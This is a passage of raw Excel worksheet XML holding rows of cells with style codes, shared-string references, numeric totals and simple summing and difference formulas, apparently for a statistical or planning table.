      <c r="R1" s="215"/>
      <c r="S1" s="215"/>
      <c r="T1" s="215"/>
      <c r="U1" s="215"/>
      <c r="V1" s="215"/>
      <c r="W1" s="215"/>
      <c r="X1" s="215"/>
      <c r="Y1" s="215"/>
      <c r="Z1" s="215"/>
      <c r="AA1" s="215"/>
      <c r="AB1" s="215"/>
      <c r="AC1" s="215"/>
      <c r="AD1" s="215"/>
      <c r="AE1" s="215"/>
      <c r="AF1" s="215"/>
      <c r="AG1" s="215"/>
      <c r="AH1" s="215"/>
      <c r="AI1" s="215"/>
      <c r="AJ1" s="215"/>
      <c r="AK1" s="215"/>
      <c r="AL1" s="215"/>
      <c r="AM1" s="215"/>
      <c r="AN1" s="215"/>
      <c r="AO1" s="215"/>
      <c r="AP1" s="215"/>
      <c r="AQ1" s="215"/>
    </row>
    <row r="2" spans="1:43" ht="16.5" customHeight="1">
      <c r="A2" s="216" t="s">
        <v>164</v>
      </c>
      <c r="B2" s="216"/>
      <c r="C2" s="216"/>
      <c r="D2" s="216"/>
      <c r="E2" s="216"/>
      <c r="F2" s="216"/>
      <c r="G2" s="216"/>
      <c r="H2" s="216"/>
      <c r="I2" s="216"/>
      <c r="J2" s="216"/>
      <c r="K2" s="216"/>
      <c r="L2" s="216"/>
      <c r="M2" s="216"/>
      <c r="N2" s="216"/>
      <c r="O2" s="216"/>
      <c r="P2" s="216"/>
      <c r="Q2" s="216"/>
      <c r="R2" s="216"/>
      <c r="S2" s="216"/>
      <c r="T2" s="216"/>
      <c r="U2" s="216"/>
      <c r="V2" s="216"/>
      <c r="W2" s="216"/>
      <c r="X2" s="216"/>
      <c r="Y2" s="216"/>
      <c r="Z2" s="216"/>
      <c r="AA2" s="216"/>
      <c r="AB2" s="216"/>
      <c r="AC2" s="216"/>
      <c r="AD2" s="216"/>
      <c r="AE2" s="216"/>
      <c r="AF2" s="216"/>
      <c r="AG2" s="216"/>
      <c r="AH2" s="216"/>
      <c r="AI2" s="216"/>
      <c r="AJ2" s="216"/>
      <c r="AK2" s="216"/>
      <c r="AL2" s="216"/>
      <c r="AM2" s="216"/>
      <c r="AN2" s="216"/>
      <c r="AO2" s="216"/>
      <c r="AP2" s="216"/>
      <c r="AQ2" s="216"/>
    </row>
    <row r="3" spans="1:43" ht="18" customHeight="1">
      <c r="A3" s="218"/>
      <c r="B3" s="218"/>
      <c r="C3" s="218"/>
      <c r="D3" s="218"/>
      <c r="E3" s="218"/>
      <c r="F3" s="218"/>
      <c r="G3" s="218"/>
      <c r="H3" s="218"/>
      <c r="I3" s="218"/>
      <c r="J3" s="218"/>
      <c r="K3" s="218"/>
      <c r="L3" s="218"/>
      <c r="M3" s="218"/>
      <c r="N3" s="218"/>
      <c r="O3" s="218"/>
      <c r="P3" s="188"/>
      <c r="Q3" s="188"/>
    </row>
    <row r="4" spans="1:43" ht="17.25" customHeight="1">
      <c r="A4" s="217" t="s">
        <v>162</v>
      </c>
      <c r="B4" s="219" t="s">
        <v>4</v>
      </c>
      <c r="C4" s="219" t="s">
        <v>0</v>
      </c>
      <c r="D4" s="213" t="s">
        <v>135</v>
      </c>
      <c r="E4" s="213" t="s">
        <v>136</v>
      </c>
      <c r="F4" s="217" t="s">
        <v>98</v>
      </c>
      <c r="G4" s="217"/>
      <c r="H4" s="217"/>
      <c r="I4" s="217"/>
      <c r="J4" s="217"/>
      <c r="K4" s="217"/>
      <c r="L4" s="217"/>
      <c r="M4" s="220" t="s">
        <v>165</v>
      </c>
      <c r="N4" s="213" t="s">
        <v>139</v>
      </c>
      <c r="O4" s="213" t="s">
        <v>167</v>
      </c>
      <c r="P4" s="184"/>
      <c r="Q4" s="184"/>
      <c r="R4" s="217" t="s">
        <v>98</v>
      </c>
      <c r="S4" s="217"/>
      <c r="T4" s="217"/>
      <c r="U4" s="217"/>
      <c r="V4" s="217"/>
      <c r="W4" s="217"/>
      <c r="X4" s="217"/>
      <c r="Y4" s="217"/>
      <c r="Z4" s="217"/>
      <c r="AA4" s="217"/>
      <c r="AB4" s="217"/>
      <c r="AC4" s="217"/>
      <c r="AD4" s="217"/>
      <c r="AE4" s="217"/>
      <c r="AF4" s="217"/>
      <c r="AG4" s="217"/>
      <c r="AH4" s="217"/>
      <c r="AI4" s="217"/>
      <c r="AJ4" s="217"/>
      <c r="AK4" s="217"/>
      <c r="AL4" s="217"/>
      <c r="AM4" s="217"/>
      <c r="AN4" s="60"/>
      <c r="AO4" s="213" t="s">
        <v>161</v>
      </c>
      <c r="AP4" s="213" t="s">
        <v>163</v>
      </c>
      <c r="AQ4" s="213" t="s">
        <v>140</v>
      </c>
    </row>
    <row r="5" spans="1:43" ht="54.75" customHeight="1">
      <c r="A5" s="217"/>
      <c r="B5" s="219"/>
      <c r="C5" s="219"/>
      <c r="D5" s="214"/>
      <c r="E5" s="214"/>
      <c r="F5" s="186" t="s">
        <v>5</v>
      </c>
      <c r="G5" s="186" t="s">
        <v>59</v>
      </c>
      <c r="H5" s="186" t="s">
        <v>85</v>
      </c>
      <c r="I5" s="186" t="s">
        <v>86</v>
      </c>
      <c r="J5" s="183" t="s">
        <v>87</v>
      </c>
      <c r="K5" s="183" t="s">
        <v>60</v>
      </c>
      <c r="L5" s="183" t="s">
        <v>61</v>
      </c>
      <c r="M5" s="221"/>
      <c r="N5" s="214"/>
      <c r="O5" s="214"/>
      <c r="P5" s="185" t="s">
        <v>141</v>
      </c>
      <c r="Q5" s="185"/>
      <c r="R5" s="186" t="s">
        <v>5</v>
      </c>
      <c r="S5" s="185"/>
      <c r="T5" s="185" t="s">
        <v>142</v>
      </c>
      <c r="U5" s="185"/>
      <c r="V5" s="186" t="s">
        <v>59</v>
      </c>
      <c r="W5" s="185"/>
      <c r="X5" s="185" t="s">
        <v>143</v>
      </c>
      <c r="Y5" s="185"/>
      <c r="Z5" s="186" t="s">
        <v>85</v>
      </c>
      <c r="AA5" s="185"/>
      <c r="AB5" s="185" t="s">
        <v>144</v>
      </c>
      <c r="AC5" s="185"/>
      <c r="AD5" s="186" t="s">
        <v>86</v>
      </c>
      <c r="AE5" s="185"/>
      <c r="AF5" s="185" t="s">
        <v>145</v>
      </c>
      <c r="AG5" s="183" t="s">
        <v>87</v>
      </c>
      <c r="AH5" s="61"/>
      <c r="AI5" s="185" t="s">
        <v>146</v>
      </c>
      <c r="AJ5" s="183" t="s">
        <v>60</v>
      </c>
      <c r="AK5" s="61"/>
      <c r="AL5" s="185" t="s">
        <v>147</v>
      </c>
      <c r="AM5" s="183" t="s">
        <v>61</v>
      </c>
      <c r="AN5" s="61"/>
      <c r="AO5" s="214"/>
      <c r="AP5" s="214"/>
      <c r="AQ5" s="214"/>
    </row>
    <row r="6" spans="1:43" ht="16.5" customHeight="1">
      <c r="A6" s="13">
        <v>1</v>
      </c>
      <c r="B6" s="13">
        <v>2</v>
      </c>
      <c r="C6" s="13">
        <v>3</v>
      </c>
      <c r="D6" s="13">
        <v>4</v>
      </c>
      <c r="E6" s="13">
        <v>5</v>
      </c>
      <c r="F6" s="13">
        <v>9</v>
      </c>
      <c r="G6" s="13">
        <v>10</v>
      </c>
      <c r="H6" s="13">
        <v>11</v>
      </c>
      <c r="I6" s="13">
        <v>12</v>
      </c>
      <c r="J6" s="13">
        <v>13</v>
      </c>
      <c r="K6" s="13">
        <v>14</v>
      </c>
      <c r="L6" s="13">
        <v>15</v>
      </c>
      <c r="M6" s="14"/>
      <c r="N6" s="13">
        <v>4</v>
      </c>
      <c r="O6" s="13">
        <v>5</v>
      </c>
      <c r="P6" s="13"/>
      <c r="Q6" s="13"/>
      <c r="R6" s="13">
        <v>6</v>
      </c>
      <c r="S6" s="13"/>
      <c r="T6" s="13"/>
      <c r="U6" s="13"/>
      <c r="V6" s="13">
        <v>7</v>
      </c>
      <c r="W6" s="13"/>
      <c r="X6" s="13"/>
      <c r="Y6" s="13"/>
      <c r="Z6" s="13">
        <v>8</v>
      </c>
      <c r="AA6" s="13"/>
      <c r="AB6" s="13"/>
      <c r="AC6" s="13"/>
      <c r="AD6" s="13">
        <v>9</v>
      </c>
      <c r="AE6" s="13"/>
      <c r="AF6" s="13"/>
      <c r="AG6" s="13">
        <v>10</v>
      </c>
      <c r="AH6" s="13"/>
      <c r="AI6" s="13"/>
      <c r="AJ6" s="13">
        <v>11</v>
      </c>
      <c r="AK6" s="13"/>
      <c r="AL6" s="13"/>
      <c r="AM6" s="13">
        <v>12</v>
      </c>
      <c r="AN6" s="13"/>
      <c r="AO6" s="13">
        <v>13</v>
      </c>
      <c r="AP6" s="13"/>
      <c r="AQ6" s="13">
        <v>14</v>
      </c>
    </row>
    <row r="7" spans="1:43" s="189" customFormat="1" ht="14.25" hidden="1" customHeight="1">
      <c r="A7" s="13">
        <v>1</v>
      </c>
      <c r="B7" s="15" t="s">
        <v>100</v>
      </c>
      <c r="C7" s="16" t="s">
        <v>41</v>
      </c>
      <c r="D7" s="17"/>
      <c r="E7" s="17"/>
      <c r="F7" s="18">
        <v>2982</v>
      </c>
      <c r="G7" s="17">
        <v>5648</v>
      </c>
      <c r="H7" s="17">
        <v>2725</v>
      </c>
      <c r="I7" s="17">
        <v>7366</v>
      </c>
      <c r="J7" s="17">
        <v>4383</v>
      </c>
      <c r="K7" s="17">
        <v>5597</v>
      </c>
      <c r="L7" s="17">
        <v>2268</v>
      </c>
      <c r="M7" s="19"/>
      <c r="N7" s="17"/>
      <c r="O7" s="17"/>
      <c r="P7" s="17"/>
      <c r="Q7" s="17"/>
      <c r="R7" s="18">
        <v>2982</v>
      </c>
      <c r="S7" s="18"/>
      <c r="T7" s="18"/>
      <c r="U7" s="18"/>
      <c r="V7" s="17">
        <v>5648</v>
      </c>
      <c r="W7" s="17"/>
      <c r="X7" s="17"/>
      <c r="Y7" s="17"/>
      <c r="Z7" s="17">
        <v>2725</v>
      </c>
      <c r="AA7" s="17"/>
      <c r="AB7" s="17"/>
      <c r="AC7" s="17"/>
      <c r="AD7" s="17">
        <v>7366</v>
      </c>
      <c r="AE7" s="17"/>
      <c r="AF7" s="17"/>
      <c r="AG7" s="17">
        <v>4383</v>
      </c>
      <c r="AH7" s="17"/>
      <c r="AI7" s="17"/>
      <c r="AJ7" s="17">
        <v>5597</v>
      </c>
      <c r="AK7" s="17"/>
      <c r="AL7" s="17"/>
      <c r="AM7" s="17">
        <v>2268</v>
      </c>
      <c r="AN7" s="17"/>
      <c r="AO7" s="17"/>
      <c r="AP7" s="17"/>
      <c r="AQ7" s="17"/>
    </row>
    <row r="8" spans="1:43" s="189" customFormat="1" ht="15" hidden="1" customHeight="1">
      <c r="A8" s="13">
        <v>1</v>
      </c>
      <c r="B8" s="15" t="s">
        <v>45</v>
      </c>
      <c r="C8" s="16" t="s">
        <v>41</v>
      </c>
      <c r="D8" s="17"/>
      <c r="E8" s="17"/>
      <c r="F8" s="17">
        <v>2944</v>
      </c>
      <c r="G8" s="17">
        <v>5575</v>
      </c>
      <c r="H8" s="17">
        <v>2690</v>
      </c>
      <c r="I8" s="17">
        <v>7271</v>
      </c>
      <c r="J8" s="17">
        <v>4327</v>
      </c>
      <c r="K8" s="17">
        <v>5525</v>
      </c>
      <c r="L8" s="17">
        <v>2239</v>
      </c>
      <c r="M8" s="19"/>
      <c r="N8" s="17"/>
      <c r="O8" s="17"/>
      <c r="P8" s="17"/>
      <c r="Q8" s="17"/>
      <c r="R8" s="17">
        <v>2944</v>
      </c>
      <c r="S8" s="17"/>
      <c r="T8" s="17"/>
      <c r="U8" s="17"/>
      <c r="V8" s="17">
        <v>5575</v>
      </c>
      <c r="W8" s="17"/>
      <c r="X8" s="17"/>
      <c r="Y8" s="17"/>
      <c r="Z8" s="17">
        <v>2690</v>
      </c>
      <c r="AA8" s="17"/>
      <c r="AB8" s="17"/>
      <c r="AC8" s="17"/>
      <c r="AD8" s="17">
        <v>7271</v>
      </c>
      <c r="AE8" s="17"/>
      <c r="AF8" s="17"/>
      <c r="AG8" s="17">
        <v>4327</v>
      </c>
      <c r="AH8" s="17"/>
      <c r="AI8" s="17"/>
      <c r="AJ8" s="17">
        <v>5525</v>
      </c>
      <c r="AK8" s="17"/>
      <c r="AL8" s="17"/>
      <c r="AM8" s="17">
        <v>2239</v>
      </c>
      <c r="AN8" s="17"/>
      <c r="AO8" s="17"/>
      <c r="AP8" s="17"/>
      <c r="AQ8" s="17"/>
    </row>
    <row r="9" spans="1:43" ht="0.75" hidden="1" customHeight="1">
      <c r="A9" s="13">
        <v>1</v>
      </c>
      <c r="B9" s="20" t="s">
        <v>99</v>
      </c>
      <c r="C9" s="21" t="s">
        <v>101</v>
      </c>
      <c r="D9" s="22"/>
      <c r="E9" s="22"/>
      <c r="F9" s="22">
        <f t="shared" ref="F9:L9" si="0">(F10/F8)*1000</f>
        <v>767.31657608695662</v>
      </c>
      <c r="G9" s="22">
        <f t="shared" si="0"/>
        <v>420.22062780269061</v>
      </c>
      <c r="H9" s="22">
        <f t="shared" si="0"/>
        <v>535.39033457249059</v>
      </c>
      <c r="I9" s="22">
        <f t="shared" si="0"/>
        <v>259.01526612570484</v>
      </c>
      <c r="J9" s="22">
        <f t="shared" si="0"/>
        <v>551.55997226715976</v>
      </c>
      <c r="K9" s="22">
        <f t="shared" si="0"/>
        <v>116.97520361990949</v>
      </c>
      <c r="L9" s="22">
        <f t="shared" si="0"/>
        <v>708.7092451987495</v>
      </c>
      <c r="M9" s="23"/>
      <c r="N9" s="22"/>
      <c r="O9" s="22"/>
      <c r="P9" s="22"/>
      <c r="Q9" s="22"/>
      <c r="R9" s="22">
        <f t="shared" ref="R9" si="1">(R10/R8)*1000</f>
        <v>477.77513586956525</v>
      </c>
      <c r="S9" s="22"/>
      <c r="T9" s="22"/>
      <c r="U9" s="22"/>
      <c r="V9" s="22">
        <f t="shared" ref="V9" si="2">(V10/V8)*1000</f>
        <v>239.46188340807177</v>
      </c>
      <c r="W9" s="22"/>
      <c r="X9" s="22"/>
      <c r="Y9" s="22"/>
      <c r="Z9" s="22">
        <f t="shared" ref="Z9" si="3">(Z10/Z8)*1000</f>
        <v>259.66171003717471</v>
      </c>
      <c r="AA9" s="22"/>
      <c r="AB9" s="22"/>
      <c r="AC9" s="22"/>
      <c r="AD9" s="22">
        <f t="shared" ref="AD9" si="4">(AD10/AD8)*1000</f>
        <v>130.94760005501308</v>
      </c>
      <c r="AE9" s="22"/>
      <c r="AF9" s="22"/>
      <c r="AG9" s="22">
        <f t="shared" ref="AG9" si="5">(AG10/AG8)*1000</f>
        <v>303.25398659579383</v>
      </c>
      <c r="AH9" s="22"/>
      <c r="AI9" s="22"/>
      <c r="AJ9" s="22">
        <f t="shared" ref="AJ9" si="6">(AJ10/AJ8)*1000</f>
        <v>69.200072398190045</v>
      </c>
      <c r="AK9" s="22"/>
      <c r="AL9" s="22"/>
      <c r="AM9" s="22">
        <f t="shared" ref="AM9" si="7">(AM10/AM8)*1000</f>
        <v>535.44707458686923</v>
      </c>
      <c r="AN9" s="22"/>
      <c r="AO9" s="22"/>
      <c r="AP9" s="22"/>
      <c r="AQ9" s="22"/>
    </row>
    <row r="10" spans="1:43" ht="10.5" hidden="1" customHeight="1">
      <c r="A10" s="13">
        <v>1</v>
      </c>
      <c r="B10" s="24" t="s">
        <v>88</v>
      </c>
      <c r="C10" s="25" t="s">
        <v>36</v>
      </c>
      <c r="D10" s="26">
        <f t="shared" ref="D10" si="8">D18+D38</f>
        <v>12563</v>
      </c>
      <c r="E10" s="26"/>
      <c r="F10" s="26">
        <f t="shared" ref="F10:L10" si="9">F18+F38</f>
        <v>2258.98</v>
      </c>
      <c r="G10" s="26">
        <f t="shared" si="9"/>
        <v>2342.73</v>
      </c>
      <c r="H10" s="26">
        <f t="shared" si="9"/>
        <v>1440.1999999999998</v>
      </c>
      <c r="I10" s="26">
        <f t="shared" si="9"/>
        <v>1883.3000000000002</v>
      </c>
      <c r="J10" s="26">
        <f t="shared" si="9"/>
        <v>2386.6000000000004</v>
      </c>
      <c r="K10" s="26">
        <f t="shared" si="9"/>
        <v>646.28800000000001</v>
      </c>
      <c r="L10" s="26">
        <f t="shared" si="9"/>
        <v>1586.8</v>
      </c>
      <c r="M10" s="27"/>
      <c r="N10" s="26"/>
      <c r="O10" s="26"/>
      <c r="P10" s="26"/>
      <c r="Q10" s="26"/>
      <c r="R10" s="26">
        <f t="shared" ref="R10" si="10">R18+R38</f>
        <v>1406.5700000000002</v>
      </c>
      <c r="S10" s="26"/>
      <c r="T10" s="26"/>
      <c r="U10" s="26"/>
      <c r="V10" s="26">
        <f t="shared" ref="V10" si="11">V18+V38</f>
        <v>1335</v>
      </c>
      <c r="W10" s="26"/>
      <c r="X10" s="26"/>
      <c r="Y10" s="26"/>
      <c r="Z10" s="26">
        <f t="shared" ref="Z10" si="12">Z18+Z38</f>
        <v>698.49</v>
      </c>
      <c r="AA10" s="26"/>
      <c r="AB10" s="26"/>
      <c r="AC10" s="26"/>
      <c r="AD10" s="26">
        <f t="shared" ref="AD10" si="13">AD18+AD38</f>
        <v>952.12</v>
      </c>
      <c r="AE10" s="26"/>
      <c r="AF10" s="26"/>
      <c r="AG10" s="26">
        <f t="shared" ref="AG10" si="14">AG18+AG38</f>
        <v>1312.1799999999998</v>
      </c>
      <c r="AH10" s="26"/>
      <c r="AI10" s="26"/>
      <c r="AJ10" s="26">
        <f t="shared" ref="AJ10" si="15">AJ18+AJ38</f>
        <v>382.33040000000005</v>
      </c>
      <c r="AK10" s="26"/>
      <c r="AL10" s="26"/>
      <c r="AM10" s="26">
        <f t="shared" ref="AM10" si="16">AM18+AM38</f>
        <v>1198.8660000000002</v>
      </c>
      <c r="AN10" s="26"/>
      <c r="AO10" s="26"/>
      <c r="AP10" s="26"/>
      <c r="AQ10" s="26"/>
    </row>
    <row r="11" spans="1:43" ht="0.75" hidden="1" customHeight="1">
      <c r="A11" s="13">
        <v>1</v>
      </c>
      <c r="B11" s="28" t="s">
        <v>76</v>
      </c>
      <c r="C11" s="29" t="s">
        <v>36</v>
      </c>
      <c r="D11" s="30">
        <f t="shared" ref="D11" si="17">D18</f>
        <v>8012</v>
      </c>
      <c r="E11" s="30"/>
      <c r="F11" s="30">
        <f t="shared" ref="F11:L11" si="18">F18</f>
        <v>1476.58</v>
      </c>
      <c r="G11" s="30">
        <f t="shared" si="18"/>
        <v>1601.83</v>
      </c>
      <c r="H11" s="30">
        <f t="shared" si="18"/>
        <v>1059.3</v>
      </c>
      <c r="I11" s="30">
        <f t="shared" si="18"/>
        <v>1326.7</v>
      </c>
      <c r="J11" s="30">
        <f t="shared" si="18"/>
        <v>1575.4</v>
      </c>
      <c r="K11" s="30">
        <f t="shared" si="18"/>
        <v>375.88800000000003</v>
      </c>
      <c r="L11" s="30">
        <f t="shared" si="18"/>
        <v>551.79999999999995</v>
      </c>
      <c r="M11" s="31"/>
      <c r="N11" s="30"/>
      <c r="O11" s="30"/>
      <c r="P11" s="30"/>
      <c r="Q11" s="30"/>
      <c r="R11" s="30">
        <f t="shared" ref="R11" si="19">R18</f>
        <v>705.97</v>
      </c>
      <c r="S11" s="30"/>
      <c r="T11" s="30"/>
      <c r="U11" s="30"/>
      <c r="V11" s="30">
        <f t="shared" ref="V11" si="20">V18</f>
        <v>694.43999999999994</v>
      </c>
      <c r="W11" s="30"/>
      <c r="X11" s="30"/>
      <c r="Y11" s="30"/>
      <c r="Z11" s="30">
        <f t="shared" ref="Z11" si="21">Z18</f>
        <v>392.48999999999995</v>
      </c>
      <c r="AA11" s="30"/>
      <c r="AB11" s="30"/>
      <c r="AC11" s="30"/>
      <c r="AD11" s="30">
        <f t="shared" ref="AD11" si="22">AD18</f>
        <v>522.9</v>
      </c>
      <c r="AE11" s="30"/>
      <c r="AF11" s="30"/>
      <c r="AG11" s="30">
        <f t="shared" ref="AG11" si="23">AG18</f>
        <v>698.74</v>
      </c>
      <c r="AH11" s="30"/>
      <c r="AI11" s="30"/>
      <c r="AJ11" s="30">
        <f t="shared" ref="AJ11" si="24">AJ18</f>
        <v>156.6104</v>
      </c>
      <c r="AK11" s="30"/>
      <c r="AL11" s="30"/>
      <c r="AM11" s="30">
        <f t="shared" ref="AM11" si="25">AM18</f>
        <v>239.45999999999998</v>
      </c>
      <c r="AN11" s="30"/>
      <c r="AO11" s="30"/>
      <c r="AP11" s="30"/>
      <c r="AQ11" s="30"/>
    </row>
    <row r="12" spans="1:43" ht="22.5" customHeight="1">
      <c r="A12" s="62" t="s">
        <v>8</v>
      </c>
      <c r="B12" s="63" t="s">
        <v>44</v>
      </c>
      <c r="C12" s="64" t="s">
        <v>39</v>
      </c>
      <c r="D12" s="65"/>
      <c r="E12" s="65"/>
      <c r="F12" s="65"/>
      <c r="G12" s="65"/>
      <c r="H12" s="65"/>
      <c r="I12" s="65"/>
      <c r="J12" s="65"/>
      <c r="K12" s="65"/>
      <c r="L12" s="65"/>
      <c r="M12" s="67"/>
      <c r="N12" s="190"/>
      <c r="O12" s="66"/>
      <c r="P12" s="66"/>
      <c r="Q12" s="66"/>
      <c r="R12" s="65"/>
      <c r="S12" s="65"/>
      <c r="T12" s="65"/>
      <c r="U12" s="65"/>
      <c r="V12" s="65"/>
      <c r="W12" s="65"/>
      <c r="X12" s="65"/>
      <c r="Y12" s="65"/>
      <c r="Z12" s="65"/>
      <c r="AA12" s="65"/>
      <c r="AB12" s="65"/>
      <c r="AC12" s="65"/>
      <c r="AD12" s="65"/>
      <c r="AE12" s="65"/>
      <c r="AF12" s="65"/>
      <c r="AG12" s="65"/>
      <c r="AH12" s="65"/>
      <c r="AI12" s="65"/>
      <c r="AJ12" s="65"/>
      <c r="AK12" s="65"/>
      <c r="AL12" s="65"/>
      <c r="AM12" s="65"/>
      <c r="AN12" s="65"/>
      <c r="AO12" s="65"/>
      <c r="AP12" s="65"/>
      <c r="AQ12" s="65"/>
    </row>
    <row r="13" spans="1:43" ht="22.5" customHeight="1">
      <c r="A13" s="68" t="s">
        <v>63</v>
      </c>
      <c r="B13" s="24" t="s">
        <v>134</v>
      </c>
      <c r="C13" s="69" t="s">
        <v>1</v>
      </c>
      <c r="D13" s="70">
        <v>12793</v>
      </c>
      <c r="E13" s="71">
        <f t="shared" ref="E13:P13" si="26">E14+E78+E129</f>
        <v>12961.3</v>
      </c>
      <c r="F13" s="71">
        <f t="shared" si="26"/>
        <v>836.19999999999993</v>
      </c>
      <c r="G13" s="71">
        <f t="shared" si="26"/>
        <v>2199.42</v>
      </c>
      <c r="H13" s="71">
        <f t="shared" si="26"/>
        <v>2154.15</v>
      </c>
      <c r="I13" s="71">
        <f t="shared" si="26"/>
        <v>3854.6</v>
      </c>
      <c r="J13" s="71">
        <f t="shared" si="26"/>
        <v>2009.9299999999998</v>
      </c>
      <c r="K13" s="71">
        <f t="shared" si="26"/>
        <v>1143.1000000000001</v>
      </c>
      <c r="L13" s="71">
        <f t="shared" si="26"/>
        <v>838.72</v>
      </c>
      <c r="M13" s="72">
        <f t="shared" si="26"/>
        <v>12941.939999999999</v>
      </c>
      <c r="N13" s="73">
        <f t="shared" si="26"/>
        <v>13136.12</v>
      </c>
      <c r="O13" s="73">
        <f t="shared" si="26"/>
        <v>13210.11</v>
      </c>
      <c r="P13" s="32">
        <f t="shared" si="26"/>
        <v>849.9</v>
      </c>
      <c r="Q13" s="33">
        <v>836.19999999999993</v>
      </c>
      <c r="R13" s="73">
        <f>R14+R78+R129</f>
        <v>849.9</v>
      </c>
      <c r="S13" s="33">
        <f>R13-Q13</f>
        <v>13.700000000000045</v>
      </c>
      <c r="T13" s="32">
        <f>T14+T78+T129</f>
        <v>2223.7200000000003</v>
      </c>
      <c r="U13" s="33">
        <v>2199.42</v>
      </c>
      <c r="V13" s="73">
        <f>V14+V78+V129</f>
        <v>2228.92</v>
      </c>
      <c r="W13" s="33">
        <f>V13-U13</f>
        <v>29.5</v>
      </c>
      <c r="X13" s="32">
        <f>X14+X78+X129</f>
        <v>2166.15</v>
      </c>
      <c r="Y13" s="33">
        <v>2154.15</v>
      </c>
      <c r="Z13" s="73">
        <f>Z14+Z78+Z129</f>
        <v>2177.85</v>
      </c>
      <c r="AA13" s="33">
        <f>Z13-Y13</f>
        <v>23.699999999999818</v>
      </c>
      <c r="AB13" s="32">
        <f>AB14+AB78+AB129</f>
        <v>3870.6</v>
      </c>
      <c r="AC13" s="33"/>
      <c r="AD13" s="73">
        <f>AD14+AD78+AD129</f>
        <v>3891.89</v>
      </c>
      <c r="AE13" s="33">
        <f>AD13-I13</f>
        <v>37.289999999999964</v>
      </c>
      <c r="AF13" s="32">
        <f>AF14+AF78+AF129</f>
        <v>2021.03</v>
      </c>
      <c r="AG13" s="73">
        <f>AG14+AG78+AG129</f>
        <v>2017.98</v>
      </c>
      <c r="AH13" s="33">
        <f>AG13-J13</f>
        <v>8.0500000000001819</v>
      </c>
      <c r="AI13" s="32">
        <f>AI14+AI78+AI129</f>
        <v>1151.0000000000002</v>
      </c>
      <c r="AJ13" s="73">
        <f>AJ14+AJ78+AJ129</f>
        <v>1161.6500000000001</v>
      </c>
      <c r="AK13" s="33">
        <f>AJ13-K13</f>
        <v>18.549999999999955</v>
      </c>
      <c r="AL13" s="32">
        <f>AL14+AL78+AL129</f>
        <v>853.72</v>
      </c>
      <c r="AM13" s="73">
        <f>AM14+AM78+AM129</f>
        <v>881.92</v>
      </c>
      <c r="AN13" s="73">
        <f>AM13-L13</f>
        <v>43.199999999999932</v>
      </c>
      <c r="AO13" s="73">
        <f>O13/N13*100</f>
        <v>100.56325612129</v>
      </c>
      <c r="AP13" s="74">
        <f>O13-M13</f>
        <v>268.17000000000189</v>
      </c>
      <c r="AQ13" s="75"/>
    </row>
    <row r="14" spans="1:43" ht="22.5" customHeight="1">
      <c r="A14" s="76" t="s">
        <v>9</v>
      </c>
      <c r="B14" s="24" t="s">
        <v>118</v>
      </c>
      <c r="C14" s="69" t="s">
        <v>1</v>
      </c>
      <c r="D14" s="70">
        <v>6787</v>
      </c>
      <c r="E14" s="71">
        <f>E16+E36+E50+E59+E68-1.75</f>
        <v>6658</v>
      </c>
      <c r="F14" s="71">
        <f>F16+F36+F50+F59+F68</f>
        <v>662.4</v>
      </c>
      <c r="G14" s="71">
        <f t="shared" ref="G14:L14" si="27">G16+G36+G50+G59+G68</f>
        <v>1278.6500000000001</v>
      </c>
      <c r="H14" s="71">
        <f t="shared" si="27"/>
        <v>1237.55</v>
      </c>
      <c r="I14" s="71">
        <f t="shared" si="27"/>
        <v>1026</v>
      </c>
      <c r="J14" s="71">
        <f t="shared" si="27"/>
        <v>1350.7</v>
      </c>
      <c r="K14" s="71">
        <f t="shared" si="27"/>
        <v>510.09</v>
      </c>
      <c r="L14" s="71">
        <f t="shared" si="27"/>
        <v>540.20000000000005</v>
      </c>
      <c r="M14" s="72">
        <f>M16+M36+M50+M59+M68</f>
        <v>6511.7099999999991</v>
      </c>
      <c r="N14" s="191">
        <f>N16+N36+N50+N59+N68</f>
        <v>6465.5900000000011</v>
      </c>
      <c r="O14" s="73">
        <f>O16+O36+O50+O59+O68</f>
        <v>6451.6900000000014</v>
      </c>
      <c r="P14" s="32">
        <f t="shared" ref="P14" si="28">P16+P36+P50+P59+P68</f>
        <v>651.1</v>
      </c>
      <c r="Q14" s="33">
        <v>662.4</v>
      </c>
      <c r="R14" s="73">
        <f>R16+R36+R50+R59+R68</f>
        <v>651.1</v>
      </c>
      <c r="S14" s="33">
        <f>R14-Q14</f>
        <v>-11.299999999999955</v>
      </c>
      <c r="T14" s="32">
        <f t="shared" ref="T14" si="29">T16+T36+T50+T59+T68</f>
        <v>1255.95</v>
      </c>
      <c r="U14" s="33">
        <v>1278.6500000000001</v>
      </c>
      <c r="V14" s="73">
        <f t="shared" ref="V14:X14" si="30">V16+V36+V50+V59+V68</f>
        <v>1267.05</v>
      </c>
      <c r="W14" s="33">
        <f>V14-U14</f>
        <v>-11.600000000000136</v>
      </c>
      <c r="X14" s="32">
        <f t="shared" si="30"/>
        <v>1215.55</v>
      </c>
      <c r="Y14" s="33">
        <v>1237.55</v>
      </c>
      <c r="Z14" s="73">
        <f t="shared" ref="Z14:AB14" si="31">Z16+Z36+Z50+Z59+Z68</f>
        <v>1217.1499999999999</v>
      </c>
      <c r="AA14" s="33">
        <f>Z14-Y14</f>
        <v>-20.400000000000091</v>
      </c>
      <c r="AB14" s="32">
        <f t="shared" si="31"/>
        <v>999</v>
      </c>
      <c r="AC14" s="33"/>
      <c r="AD14" s="73">
        <f t="shared" ref="AD14:AF14" si="32">AD16+AD36+AD50+AD59+AD68</f>
        <v>993.24</v>
      </c>
      <c r="AE14" s="33">
        <f>AD14-I14</f>
        <v>-32.759999999999991</v>
      </c>
      <c r="AF14" s="32">
        <f t="shared" si="32"/>
        <v>1325.7</v>
      </c>
      <c r="AG14" s="73">
        <f t="shared" ref="AG14:AI14" si="33">AG16+AG36+AG50+AG59+AG68</f>
        <v>1329.72</v>
      </c>
      <c r="AH14" s="33">
        <f>AG14-J14</f>
        <v>-20.980000000000018</v>
      </c>
      <c r="AI14" s="32">
        <f t="shared" si="33"/>
        <v>494.09000000000009</v>
      </c>
      <c r="AJ14" s="73">
        <f t="shared" ref="AJ14:AL14" si="34">AJ16+AJ36+AJ50+AJ59+AJ68</f>
        <v>469.22999999999996</v>
      </c>
      <c r="AK14" s="33">
        <f>AJ14-K14</f>
        <v>-40.860000000000014</v>
      </c>
      <c r="AL14" s="32">
        <f t="shared" si="34"/>
        <v>524.20000000000005</v>
      </c>
      <c r="AM14" s="73">
        <f t="shared" ref="AM14" si="35">AM16+AM36+AM50+AM59+AM68</f>
        <v>524.20000000000005</v>
      </c>
      <c r="AN14" s="73">
        <f>AM14-L14</f>
        <v>-16</v>
      </c>
      <c r="AO14" s="73">
